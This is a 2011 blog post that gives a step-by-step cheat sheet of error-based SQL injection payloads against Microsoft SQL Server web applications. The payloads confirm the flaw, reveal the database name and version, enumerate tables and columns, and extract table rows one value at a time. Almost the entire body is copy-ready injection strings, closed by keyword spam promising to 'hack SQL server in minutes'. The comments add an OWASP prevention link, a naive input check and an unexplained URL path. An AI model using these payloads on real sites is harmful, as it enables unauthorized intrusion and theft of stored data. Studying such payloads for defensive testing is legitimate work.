Tuesday, November 22, 2011

MS SQL Data Dump SQL Queries

MS-SQL data dumping queries for manual penetration testing [sql injection].

In this article I'll describe how to gain access to the back-end ms-sql server & dump the all database contents by renowned SQL Injection flaw. I have given the all required sql queries in different steps. Before executing the given queries, you have to make sure the target web application is vulnerable to SQL Injection.

Note : I have tested the queries on MS-SQL 2005/2008 Server.

Confirming the Sql Injection [SQL Query]
Step 1 > aaa' OR
Step 2 > aaa' and (select count(*) from sometable)=1 or '1'='0

Retrieve Database Name [SQL Query]
Step 3
> aaa' AND (select cast(CHAR(127)+db_name(dbid)+CHAR(127) as int) from master..sysprocesses where spid=@@SPID) = 1 OR '2'='1

Find ms Sql Version [SQL Query]
Step 4
> aaa' AND (select cast(CHAR(127)+@@Version+CHAR(127) as int)) = 1 OR '2'='0

No. of user Tables [SQL Query]
Step 5
> aaa' AND (select cast(CHAR(127)+cast(count(name) as varchar )+CHAR(127) as int) from Sysobjects where xtype in('u','v')) = 0 OR '2'='0

Enumerating the table names [ Get no. of user's tables from step 5] [SQL Query]
Step 6
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 1 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 2 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 3 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 4 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 5 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 6 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 7 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 8 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 9 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 10 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 11 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+name+CHAR(127) as int) from(select TOP 1 lower(name) as name from (select TOP 12 name from sysobjects where xtype in('u','v') order by 1 DESC) TABLENAMES order by 1 ASC)TableNames2) = 1 OR '2'='0

No. of attributes/columns in a table [Get table names from step 6] [SQL Query]
Step 7
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-1'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-2'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-3'))Tablename) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+count+CHAR(127) as int) from (select cast(count(name) as varchar) as count from syscolumns where id = (select id from sysobjects where name='Table-4'))Tablename) = 1 OR '2'='0
Enumerating Attributes' names of a table [Get no. of attributes from step 7] [SQL Query]
Step 8
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 1 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 2 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 3 name from syscolumns where id = (select id from sysobjects where name='Table-1') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+( select TOP 1 name from (select top 1 name from syscolumns where id = (select id from sysobjects where name='Table-2') order by 1 DESC) ctable order by 1 ASC)+CHAR(127) as int)) = 1 OR '2'='0


No. of records/rows in a Table [SQL Query]
Step 9
> aaa' AND (select cast(CHAR(127)+cast(count(*) as varchar)+CHAR(127) as int) from Table-1) = 1 OR '2'='0
> aaa' AND (select cast(CHAR(127)+cast(count(*) as varchar)+CHAR(127) as int) from Table-2) = 1 OR '2'='0


Extracting Data from a Table [SQL Query]
Step 10
1st > aaa' AND (select cast(CHAR(127)+rtrim(ISNULL(cast(Coluumn-1 as varchar),'null'))+CHAR(127) as int) from (select top 1 * from Table-1 order by 1 desc) dtable) = 1 OR '2'='0
2nd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-1 as varchar),'null') from (select top 1 * from (select TOP 2 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
3rd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-1 as varchar),'null') from (select top 1 * from (select TOP 3 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
4th > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-1 as varchar),'null') from (select top 1 * from (select TOP 4 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0

1st > aaa' AND (select cast(CHAR(127)+rtrim(ISNULL(cast(Coluumn-2 as varchar),'null'))+CHAR(127) as int) from (select top 1 * from Table-1 order by 1 desc) dtable) = 1 OR '2'='0
2nd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-2 as varchar),'null') from (select top 1 * from (select TOP 2 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
3rd > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-2 as varchar),'null') from (select top 1 * from (select TOP 3 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0
4th > aaa' AND (select cast(CHAR(127)+rtrim(cast((select ISNULL(cast(Coluumn-2 as varchar),'null') from (select top 1 * from (select TOP 4 * from Table-1 order by 1 desc) dtable order by 1 asc) finaltable) as varchar))+CHAR(127) as int)) = 1 OR '2'='0

Ms SQL server hacking using SQL Injection.MS SQL SQL Injection and data dumping using SQL Injection.SQL Injection and MS SQL penetration testing.Hacking SQL Server.Hack SQL server in minutes.Gain access to MS SQL server in minutes.Penetration Testing MS SQL server in minutes.Hack SQL server, hacking article, hacking techniques,penetration testing MS SQL, MS SQL and SQL Injection.

Simple Query ....
Select o.name as 'Table', c.name as 'Field' From dbo.sysobjects o, dbo.syscolumns c Where o.id = c.id and o.xtype = 'U' Order by o.name, c.colid

Posted by at
Labels:

4 comments:

  1. AshisDecember 29, 2011 at 6:06 AM

    Good informative post! Also do a post to put some lights on how to prevent these kind of injections!!

    ReplyDelete
  2. The Vega (★)December 29, 2011 at 8:37 AM

    Yes Sir ... https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

    ReplyDelete
  3. AnonymousJanuary 21, 2012 at 11:53 PM

    /shop2/ent2/a03amnb986pk2/password_forgotten.php

    ReplyDelete
  4. AzamApril 28, 2012 at 8:29 AM

    if(!is_numeric($_GET['id']) || strlen($_GET['id']) > 10) die("Blocked");

    ReplyDelete

Subscribe to: Post Comments (Atom)